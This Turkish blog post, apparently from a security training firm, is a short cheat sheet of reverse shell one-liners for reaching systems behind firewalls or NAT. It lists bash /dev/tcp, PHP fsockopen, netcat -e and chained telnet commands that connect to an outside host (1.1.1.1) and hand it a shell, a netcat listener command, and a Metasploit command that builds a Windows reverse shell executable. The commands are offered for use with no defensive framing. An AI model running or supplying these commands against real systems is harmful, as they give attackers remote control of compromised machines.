Firewall Arkasındaki Sistemler İçin Pratik Reverse Shell Alma Yöntemleri

“Nat Arkasındaki Sistemler İçin Reverse Shell Alma Yöntemleri” konulu blog girdisinde, NAT arkasındaki sistemlere erişim mantığı ve örnek netcat uygulaması yer alıyor. Bu yazıda, farklı durumlarda pratik olarak reverse shell alma teknikleri bulunuyor;

Not: Dinleme modunda “nc -lvp 443” komutu kullanılabilir.

BASH

bash -i >& /dev/tcp/1.1.1.1/443 0>&1  (Red hat tabanlı sistemler için)

PHP

php -r ‘$sock=fsockopen(“1.1.1.1”,443);exec(“/bin/sh -i <&3 >&3 2>&3”);’

Netcat

nc -e /bin/sh 1.1.1.1 443

Telnet

telnet 1.1.1.1 4444 | /bin/bash | telnet 1.1.1.1 443

Windows Reverse Shell (metasploit)

#msfpayload windows/shell/reverse_tcp LHOST=1.1.1.1 LPORT=443 X > shell.exe

 

Yazar:Ozan UÇAR

ozan.ucar@bga.com.tr

Yorum Yaz

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

*
*

Mail listemize üye olarak eğitim fırsatlarını kaçırmayın!
Eğitim ve ücretsiz etkinliklerizden haberdar olmak için e-posta listesimize üye olun!.